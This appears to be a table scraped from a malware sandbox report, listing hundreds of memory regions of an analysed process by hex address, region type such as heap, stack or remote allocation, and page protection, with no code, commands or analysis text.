||
|
7D80000
|
heap
|
page read and write
|
||
|
57C0000
|
direct allocation
|
page read and write
|
||
|
2848D4E0000
|
trusted library allocation
|
page read and write
|
||
|
222CD39E000
|
heap
|
page read and write
|
||
|
222CD3A2000
|
heap
|
page read and write
|
||
|
7FFD347C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
|
4D69000
|
trusted library allocation
|
page read and write
|
||
|
530E000
|
heap
|
page read and write
|
||
|
2849CC91000
|
trusted library allocation
|
page read and write
|
||
|
222CD3C3000
|
heap
|
page read and write
|
||
|
2170D000
|
heap
|
page read and write
|
||
|
222CB390000
|
heap
|
page read and write
|
||
|
222CB5A3000
|
heap
|
page read and write
|
||
|
7DD0000
|
trusted library allocation
|
page read and write
|
||
|
8E80000
|
direct allocation
|
page read and write
|
||
|
284A52DD000
|
heap
|
page read and write
|
||
|
350A000
|
heap
|
page read and write
|
||
|
907EC7E000
|
stack
|
page read and write
|
||
|
52D1000
|
heap
|
page read and write
|
||
|
7CFE000
|
stack
|
page read and write
|
||
|
2180D000
|
unclassified section
|
page execute and read and write
|
||
|
21709000
|
heap
|
page read and write
|
||
|
7DE0000
|
trusted library allocation
|
page read and write
|
||
|
52E4000
|
heap
|
page read and write
|
||
|
222CB5F8000
|
heap
|
page read and write
|
||
|
50DF000
|
stack
|
page read and write
|
||
|
5AC3000
|
trusted library allocation
|
page read and write
|
||
|
7C50000
|
trusted library allocation
|
page read and write
|
||
|
4CEB000
|
heap
|
page read and write
|
||
|
52E6000
|
heap
|
page read and write
|
||
|
4DA9000
|
heap
|
page read and write
|
||
|
52DF000
|
heap
|
page read and write
|
||
|
5851000
|
heap
|
page read and write
|
||
|
57D8000
|
heap
|
page read and write
|
||
|
3020000
|
heap
|
page read and write
|
||
|
35AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
222CB5A3000
|
heap
|
page read and write
|
||
|
52DB000
|
heap
|
page read and write
|
||
|
4EB0000
|
trusted library allocation
|
page read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
770000
|
heap
|
page readonly
|
||
|
52D1000
|
heap
|
page read and write
|
||
|
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
52D1000
|
heap
|
page read and write
|
||
|
222CD450000
|
remote allocation
|
page read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
8D2C000
|
stack
|
page read and write
|
||
|
79D4000
|
heap
|
page read and write
|
||
|
594D000
|
trusted library allocation
|
page read and write
|
||
|
222CD358000
|
heap
|
page read and write
|
||
|
2848D47D000
|
trusted library allocation
|
page read and write
|
||
|
2848AF20000
|
heap
|
page read and write
|
||
|
5851000
|
heap
|
page read and write
|
||
|
7560000
|
direct allocation
|
page read and write
|
||
|
327E000
|
stack
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
52D9000
|
heap
|
page read and write
|
||
|
284A52D1000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
5316000
|
heap
|
page read and write
|
||
|
2848AF73000
|
heap
|
page read and write
|
||
|
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
|
5851000
|
heap
|
page read and write
|
||
|
222CD3C6000
|
heap
|
page read and write
|
||
|
2171C000
|
heap
|
page read and write
|
||
|
20E2B000
|
stack
|
page read and write
|
||
|
222CD54A000
|
heap
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
52DF000
|
heap
|
page read and write
|
||
|
50FE000
|
heap
|
page read and write
|
||
|
3500000
|
heap
|
page read and write
|
||
|
52DA000
|
heap
|
page read and write
|
||
|
5855000
|
heap
|
page read and write
|
||
|
2848CC60000
|
heap
|
page execute and read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
3150000
|
heap
|
page read and write
|
||
|
222CD3F0000
|
heap
|
page read and write
|
||
|
2848EC83000
|
trusted library allocation
|
page read and write
|
||
|
2D4D000
|
stack
|
page read and write
|
||
|
222CD4EF000
|
heap
|
page read and write
|
||
|
2A23000
|
heap
|
page read and write
|
||
|
4D0E000
|
heap
|
page read and write
|
||
|
222CB571000
|
heap
|
page read and write
|
||
|
8CEC000
|
stack
|
page read and write
|
||
|
5A10000
|
direct allocation
|
page read and write
|
||
|
15C000
|
stack
|
page read and write
|
||
|
7590000
|
direct allocation
|
page read and write
|
||
|
52D9000
|
heap
|
page read and write
|
||
|
7E00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
|
2108D000
|
stack
|
page read and write
|
||
|
222CB54E000
|
heap
|
page read and write
|
||
|
222CD3C3000
|
heap
|
page read and write
|
||
|
51D1000
|
heap
|
page read and write
|
||
|
5841000
|
heap
|
page read and write
|
||
|
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
|
2848E567000
|
trusted library allocation
|
page read and write
|
||
|
2848B1C0000
|
trusted library allocation
|
page read and write
|
||
|
2848AFB8000
|
heap
|
page read and write
|
||
|
7FFD347B2000
|
trusted library allocation
|
page read and write
|
||
|
907F07E000
|
stack
|
page read and write
|
||
|
7C6D000
|
trusted library allocation
|
page read and write
|
||
|
222CB4EF000
|
heap
|
page read and write
|
||
|
7A77000
|
heap
|
page read and write
|
||
|
4D70000
|
trusted library allocation
|
page read and write
|
||
|
222CD38A000
|
heap
|
page read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
52F4000
|
heap
|
page read and write
|
||
|
4F66000
|
remote allocation
|
page execute and read and write
|
||
|
7C00000
|
trusted library allocation
|
page read and write
|
||
|
52DB000
|
heap
|
page read and write
|
||
|
222CD3A0000
|
heap
|
page read and write
|
||
|
2848E57B000
|
trusted library allocation
|
page read and write
|
||
|
585D000
|
heap
|
page read and write
|
||
|
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
|
51C0000
|
heap
|
page read and write
|
||
|
907EF7E000
|
stack
|
page read and write
|
||
|
222CD343000
|
heap
|
page read and write
|
||
|
222CD23C000
|
heap
|
page read and write
|
||
|
284A5180000
|
heap
|
page read and write
|
||
|
222CD384000
|
heap
|
page read and write
|
||
|
5AE8000
|
trusted library allocation
|
page read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
222CD3C6000
|
heap
|
page read and write
|
||
|
7E40000
|
trusted library allocation
|
page read and write
|
||
|
8E70000
|
direct allocation
|
page read and write
|
||
|
7FFD345EB000
|
trusted library allocation
|
page read and write
|
||
|
54D0000
|
trusted library allocation
|
page read and write
|
||
|
3620000
|
heap
|
page read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
|
4DA0000
|
trusted library allocation
|
page read and write
|
||
|
8850000
|
trusted library allocation
|
page read and write
|
||
|
2DE5000
|
heap
|
page read and write
|
||
|
52F8000
|
heap
|
page read and write
|
||
|
324E000
|
stack
|
page read and write
|
||
|
5841000
|
heap
|
page read and write
|
||
|
222CB5F0000
|
heap
|
page read and write
|
||
|
222CD38A000
|
heap
|
page read and write
|
||
|
7FFD34686000
|
trusted library allocation
|
page read and write
|
||
|
907E71E000
|
stack
|
page read and write
|
||
|
8DAE000
|
stack
|
page read and write
|
||
|
216FB000
|
heap
|
page read and write
|
||
|
7A98000
|
trusted library allocation
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
222CD331000
|
heap
|
page read and write
|
||
|
896F000
|
heap
|
page read and write
|
||
|
222CD3B4000
|
heap
|
page read and write
|
||
|
284A54A0000
|
heap
|
page read and write
|
||
|
4CE1000
|
heap
|
page read and write
|
||
|
4D0E000
|
heap
|
page read and write
|
||
|
222CD3C6000
|
heap
|
page read and write
|
||
|
21886000
|
unclassified section
|
page execute and read and write
|
||
|
5315000
|
heap
|
page read and write
|
||
|
509E000
|
stack
|
page read and write
|
||
|
222CD3A4000
|
heap
|
page read and write
|
||
|
2FA63FF000
|
stack
|
page read and write
|
||
|
1AFFF130000
|
heap
|
page read and write
|
||
|
907EA7E000
|
stack
|
page read and write
|
||
|
2A2C000
|
heap
|
page read and write
|
||
|
284A50E0000
|
heap
|
page execute and read and write
|
||
|
35A0000
|
trusted library allocation
|
page read and write
|
||
|
8830000
|
trusted library allocation
|
page execute and read and write
|
||
|
222CB4EF000
|
heap
|
page read and write
|
||
|
222CB4E9000
|
heap
|
page read and write
|
||
|
5851000
|
heap
|
page read and write
|
||
|
4CDD000
|
heap
|
page read and write
|
||
|
222CD3EE000
|
heap
|
page read and write
|
||
|
222CD3C6000
|
heap
|
page read and write
|
||
|
34DD000
|
stack
|
page read and write
|
||
|
8E20000
|
trusted library allocation
|
page read and write
|
||
|
3427000
|
heap
|
page read and write
|
||
|
5301000
|
heap
|
page read and write
|
||
|
3110000
|
heap
|
page readonly
|
||
|
284A5160000
|
heap
|
page read and write
|
||
|
52DF000
|
heap
|
page read and write
|
||
|
8D6B000
|
stack
|
page read and write
|
||
|
284A52F9000
|
heap
|
page read and write
|
||
|
2121D000
|
stack
|
page read and write
|
||
|
4CE0000
|
heap
|
page read and write
|
||
|
357F000
|
stack
|
page read and write
|
||
|
351F000
|
stack
|
page read and write
|
||
|
2A20000
|
heap
|
page read and write
|
||
|
2848AF6A000
|
heap
|
page read and write
|
||
|
52DF000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
7E10000
|
trusted library allocation
|
page read and write
|
||
|
222CD34D000
|
heap
|
page read and write
|
||
|
5851000
|
heap
|
page read and write
|
||
|
7E30000
|
trusted library allocation
|
page read and write
|
||
|
216F6000
|
heap
|
page read and write
|
||
|
51C0000
|
direct allocation
|
page read and write
|
||
|
7E9C000
|
stack
|
page read and write
|
||
|
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
|
7D3E000
|
stack
|
page read and write
|
||
|
222CD3B4000
|
heap
|
page read and write
|
||
|
222CD3F9000
|
heap
|
page read and write
|
||
|
2104D000
|
stack
|
page read and write
|
||
|
907FB4E000
|
stack
|
page read and write
|
||
|
222CB4EE000
|
heap
|
page read and write
|
||
|
7570000
|
direct allocation
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
34CF000
|
stack
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
222CD3A0000
|
heap
|
page read and write
|
||
|
222CB5AE000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
8E30000
|
trusted library allocation
|
page read and write
|
||
|
346F000
|
unkown
|
page read and write
|
||
|
7FFD346B6000
|
trusted library allocation
|
page execute and read and write
|
||
|
907EBFE000
|
stack
|
page read and write
|
||
|
907E693000
|
stack
|
page read and write
|
||
|
222CD495000
|
heap
|
page read and write
|
||
|
222CD384000
|
heap
|
page read and write
|
||
|
7E20000
|
trusted library allocation
|
page read and write
|
||
|
52F5000
|
heap
|
page read and write
|
||
|
222CD3E6000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
74141FF000
|
stack
|
page read and write
|
||
|
2848D4C4000
|
trusted library allocation
|
page read and write
|
||
|
284A5260000
|
heap
|
page read and write
|
||
|
8BC5000
|
trusted library allocation
|
page read and write
|
||
|
4CE000
|
stack
|
page read and write
|
||
|
2848CC10000
|
heap
|
page execute and read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
4CE1000
|
heap
|
page read and write
|
||
|
222CB509000
|
heap
|
page read and write
|
||
|
3100000
|
heap
|
page readonly
|
||
|
222CD3B8000
|
heap
|
page read and write
|
||
|
3509000
|
heap
|
page read and write
|
||
|
2848CC71000
|
trusted library allocation
|
page read and write
|
||
|
222CB5FB000
|
heap
|
page read and write
|
||
|
52DF000
|
heap
|
page read and write
|
||
|
88CD000
|
stack
|
page read and write
|
||
|
216F6000
|
heap
|
page read and write
|
||
|
222CD220000
|
heap
|
page read and write
|
||
|
2848CAF0000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
21489000
|
heap
|
page read and write
|
||
|
2848AF77000
|
heap
|
page read and write
|
||
|
1AFFF170000
|
heap
|
page read and write
|
||
|
222CD237000
|
heap
|
page read and write
|
||
|
222CD39E000
|
heap
|
page read and write
|
||
|
222CD252000
|
heap
|
page read and write
|
||
|
222CB4C0000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
222CD3DE000
|
heap
|
page read and write
|
||
|
350A000
|
heap
|
page read and write
|
||
|
89A5000
|
heap
|
page read and write
|
||
|
7FFD345D2000
|
trusted library allocation
|
page read and write
|
||
|
52DF000
|
heap
|
page read and write
|
||
|
52D1000
|
heap
|
page read and write
|
||
|
74142FB000
|
stack
|
page read and write
|
||
|
7FFD347D0000
|
trusted library allocation
|
page read and write
|
||
|
222CD38A000
|
heap
|
page read and write
|
||
|
21488000
|
heap
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
20F3E000
|
stack
|
page read and write
|
||
|
5841000
|
heap
|
page read and write
|
||
|
222CD3F9000
|
heap
|
page read and write
|
||
|
5856000
|
heap
|
page read and write
|
||
|
7C10000
|
trusted library allocation
|
page read and write
|
||
|
222CB4E8000
|
heap
|
page read and write
|
||
|
4EC9000
|
heap
|
page read and write
|
||
|
5C1E000
|
trusted library allocation
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
5A08000
|
trusted library allocation
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
3380000
|
heap
|
page read and write
|
||
|
222CD252000
|
heap
|
page read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
222CD3B4000
|
heap
|
page read and write
|
||
|
7FFD345E0000
|
trusted library allocation
|
page read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
5851000
|
heap
|
page read and write
|
||
|
52D1000
|
heap
|
page read and write
|
||
|
2167B000
|
heap
|
page read and write
|
||
|
222CD22C000
|
heap
|
page read and write
|
||
|
7BD0000
|
trusted library allocation
|
page read and write
|
||
|
8860000
|
heap
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
222CB5FD000
|
heap
|
page read and write
|
||
|
284A4FB8000
|
heap
|
page read and write
|
||
|
2FA5F7D000
|
stack
|
page read and write
|
||
|
222CB568000
|
heap
|
page read and write
|
||
|
52F2000
|
heap
|
page read and write
|
||
|
4D7A000
|
trusted library allocation
|
page execute and read and write
|
||
|
8827000
|
stack
|
page read and write
|
||
|
211D0000
|
heap
|
page read and write
|
||
|
2D9F000
|
stack
|
page read and write
|
||
|
7D90000
|
trusted library allocation
|
page read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
480000
|
heap
|
page readonly
|
||
|
222CD513000
|
heap
|
page read and write
|
||
|
4DEE000
|
stack
|
page read and write
|
||
|
350A000
|
heap
|
page read and write
|
||
|
2848DF0F000
|
trusted library allocation
|
page read and write
|
||
|
63AD000
|
trusted library allocation
|
page read and write
|
||
|
52DB000
|
heap
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
5307000
|
heap
|
page read and write
|
||
|
52D1000
|
heap
|
page read and write
|
||
|
222CD3A2000
|
heap
|
page read and write
|
||
|
222CD22F000
|
heap
|
page read and write
|
||
|
89A1000
|
heap
|
page read and write
|
||
|
216F6000
|
heap
|
page read and write
|
||
|
4F0E000
|
stack
|
page read and write
|
||
|
7FFD34690000
|
trusted library allocation
|
page execute and read and write
|
||
|
339E000
|
heap
|
page read and write
|
||
|
20CEE000
|
stack
|
page read and write
|
||
|
2848CA40000
|
heap
|
page read and write
|
||
|
52DC000
|
heap
|
page read and write
|
||
|
2848E577000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3468C000
|
trusted library allocation
|
page execute and read and write
|
||
|
222CD348000
|
heap
|
page read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
3520000
|
heap
|
page read and write
|
||
|
222CB53A000
|
heap
|
page read and write
|
||
|
8E00000
|
trusted library allocation
|
page read and write
|
||
|
5C69000
|
trusted library allocation
|
page read and write
|
||
|
2D8B000
|
stack
|
page read and write
|
||
|
4CB0000
|
heap
|
page read and write
|
||
|
350B000
|
heap
|
page read and write
|
||
|
222CD237000
|
heap
|
page read and write
|
||
|
5C8000
|
heap
|
page read and write
|
||
|
216AB000
|
heap
|
page read and write
|
||
|
2D86000
|
stack
|
page read and write
|
||
|
222CD3EC000
|
heap
|
page read and write
|
||
|
2D6C000
|
stack
|
page read and write
|
||
|
3A70000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
|
2D8C000
|
stack
|
page read and write
|
||
|
6287000
|
trusted library allocation
|
page read and write
|
||
|
74146FB000
|
stack
|
page read and write
|
||
|
216FB000
|
heap
|
page read and write
|
||
|
907EAFD000
|
stack
|
page read and write
|
||
|
5A20000
|
heap
|
page read and write
|
||
|
21501000
|
heap
|
page read and write
|
||
|
222CB5BD000
|
heap
|
page read and write
|
||
|
8967000
|
heap
|
page read and write
|
||
|
52D8000
|
heap
|
page read and write
|
||
|
8B40000
|
trusted library allocation
|
page read and write
|
||
|
222CD364000
|
heap
|
page read and write
|
||
|
5329000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
57B0000
|
direct allocation
|
page read and write
|
||
|
4CE6000
|
heap
|
page read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
|
222CB563000
|
heap
|
page read and write
|
||
|
1AFFF140000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
21489000
|
heap
|
page read and write
|
||
|
222CD3C6000
|
heap
|
page read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
218B0000
|
heap
|
page read and write
|
||
|
222CD3B8000
|
heap
|
page read and write
|
||
|
3030000
|
heap
|
page read and write
|
||
|
907FCCB000
|
stack
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
216EB000
|
heap
|
page read and write
|
||
|
51B5000
|
heap
|
page execute and read and write
|
||
|
284A50E7000
|
heap
|
page execute and read and write
|
||
|
52D9000
|
heap
|
page read and write
|
||
|
350B000
|
heap
|
page read and write
|
||
|
284A52B5000
|
heap
|
page read and write
|
||
|
ACC6000
|
direct allocation
|
page execute and read and write
|
||
|
211CF000
|
stack
|
page read and write
|
||
|
21361000
|
direct allocation
|
page execute and read and write
|
||
|
35A4000
|
trusted library allocation
|
page read and write
|
||
|
3230000
|
heap
|
page read and write
|
||
|
2100C000
|
stack
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
2170D000
|
heap
|
page read and write
|
||
|
284A52E4000
|
heap
|
page read and write
|
||
|
8973000
|
heap
|
page read and write
|
||
|
5841000
|
heap
|
page read and write
|
||
|
222CD364000
|
heap
|
page read and write
|
||
|
7413DFE000
|
stack
|
page read and write
|
||
|
222CD3A4000
|
heap
|
page read and write
|
||
|
7D7D000
|
stack
|
page read and write
|
||
|
54D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34680000
|
trusted library allocation
|
page read and write
|
||
|
222CD3CC000
|
heap
|
page read and write
|
||
|
222CD221000
|
heap
|
page read and write
|
||
|
212BE000
|
stack
|
page read and write
|
||
|
5842000
|
heap
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
51F0000
|
direct allocation
|
page read and write
|
||
|
222CD330000
|
heap
|
page read and write
|
||
|
20930000
|
direct allocation
|
page read and write
|
||
|
74143FC000
|
stack
|
page read and write
|
||
|
20DED000
|
stack
|
page read and write
|
||
|
52F3000
|
heap
|
page read and write
|
||
|
4EA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
52F1000
|
heap
|
page read and write
|
||
|
4CD0000
|
heap
|
page read and write
|
||
|
2848EBA4000
|
trusted library allocation
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
52D1000
|
heap
|
page read and write
|
||
|
222CB5F8000
|
heap
|
page read and write
|
||
|
52F1000
|
heap
|
page read and write
|
||
|
5845000
|
heap
|
page read and write
|
||
|
222CD3A0000
|
heap
|
page read and write
|
||
|
222CD252000
|
heap
|
page read and write
|
||
|
222CD3B8000
|
heap
|
page read and write
|
||
|
51E0000
|
direct allocation
|
page read and write
|
||
|
52F2000
|
heap
|
page read and write
|
||
|
51B0000
|
heap
|
page execute and read and write
|
||
|
222CD384000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
222CB527000
|
heap
|
page read and write
|
||
|
222CD3F0000
|
heap
|
page read and write
|
||
|
52DF000
|
heap
|
page read and write
|
||
|
58DD000
|
trusted library allocation
|
page read and write
|
||
|
222CD3A4000
|
heap
|
page read and write
|
||
|
222CD227000
|
heap
|
page read and write
|
||
|
199000
|
stack
|
page read and write
|
||
|
7A04000
|
heap
|
page read and write
|
||
|
4E9C000
|
stack
|
page read and write
|
||
|
7C70000
|
trusted library allocation
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
222CD3A0000
|
heap
|
page read and write
|
||
|
4D85000
|
trusted library allocation
|
page execute and read and write
|
||
|
284A5318000
|
heap
|
page read and write
|
||
|
216FB000
|
heap
|
page read and write
|
||
|
52D1000
|
heap
|
page read and write
|
||
|
20D6E000
|
stack
|
page read and write
|
||
|
897B000
|
heap
|
page read and write
|
||
|
7FFD345D0000
|
trusted library allocation
|
page read and write
|
||
|
33D7000
|
heap
|
page read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
222CD3C3000
|
heap
|
page read and write
|
||
|
63B3000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
|
222CD384000
|
heap
|
page read and write
|
||
|
222CB5F9000
|
heap
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
222CD364000
|
heap
|
page read and write
|
||
|
7DA0000
|
trusted library allocation
|
page read and write
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
21602000
|
heap
|
page read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
2FB8000
|
stack
|
page read and write
|
||
|
5050000
|
heap
|
page read and write
|
||
|
2848EA98000
|
trusted library allocation
|
page read and write
|
||
|
4CD8000
|
heap
|
page read and write
|
||
|
4CE1000
|
heap
|
page read and write
|
||
|
284A4FC0000
|
heap
|
page read and write
|
||
|
2849CC71000
|
trusted library allocation
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
222CD3B4000
|
heap
|
page read and write
|
||
|
222CD38A000
|
heap
|
page read and write
|
||
|
8CAE000
|
stack
|
page read and write
|
||
|
33C7000
|
heap
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
51D1000
|
heap
|
page read and write
|
||
|
350B000
|
heap
|
page read and write
|
||
|
907EDFE000
|
stack
|
page read and write
|
||
|
32BE000
|
stack
|
page read and write
|
||
|
585D000
|
heap
|
page read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
7A1E000
|
heap
|
page read and write
|
||
|
51D0000
|
heap
|
page read and write
|
||
|
216F6000
|
heap
|
page read and write
|
||
|
7FFD345D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
5855000
|
heap
|
page read and write
|
||
|
7FFD34800000
|
trusted library allocation
|
page read and write
|
||
|
907EB7F000
|
stack
|
page read and write
|
||
|
30FD000
|
stack
|
page read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
284A4FB0000
|
heap
|
page read and write
|
||
|
222CD3B8000
|
heap
|
page read and write
|
||
|
7CBE000
|
stack
|
page read and write
|
||
|
2188C000
|
unclassified section
|
page execute and read and write
|
||
|
52E0000
|
heap
|
page read and write
|
||
|
222CD3C3000
|
heap
|
page read and write
|
||
|
21411000
|
heap
|
page read and write
|
||
|
327C000
|
heap
|
page read and write
|
||
|
2848D4A6000
|
trusted library allocation
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
222CD470000
|
heap
|
page read and write
|
||
|
7FFD34810000
|
trusted library allocation
|
page read and write
|
||
|
222CD364000
|
heap
|
page read and write
|
||
|
222CD39E000
|
heap
|
page read and write
|
||
|
907F0FC000
|
stack
|
page read and write
|
||
|
222CD450000
|
remote allocation
|
page read and write
|
||
|
8840000
|
trusted library allocation
|
page read and write
|
||
|
5A53000
|
trusted library allocation
|
page read and write
|
||
|
222CD353000
|
heap
|
page read and write
|
||
|
4D0E000
|
heap
|
page read and write
|
||
|
222CD3C3000
|
heap
|
page read and write
|
||
|
5150000
|
direct allocation
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
349B000
|
heap
|
page read and write
|
||
|
2DE5000
|
heap
|
page read and write
|
||
|
5886000
|
heap
|
page read and write
|
||
|
320E000
|
unkown
|
page read and write
|
||
|
5855000
|
heap
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
907ECFD000
|
stack
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
460F000
|
stack
|
page read and write
|
||
|
5329000
|
heap
|
page read and write
|
||
|
5928000
|
trusted library allocation
|
page read and write
|
||
|
222CD364000
|
heap
|
page read and write
|
||
|
212FF000
|
stack
|
page read and write
|
||
|
222CB5BB000
|
heap
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
5841000
|
heap
|
page read and write
|
||
|
7BE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
32CA000
|
heap
|
page read and write
|
There are 1001 hidden memdumps, click here to show them.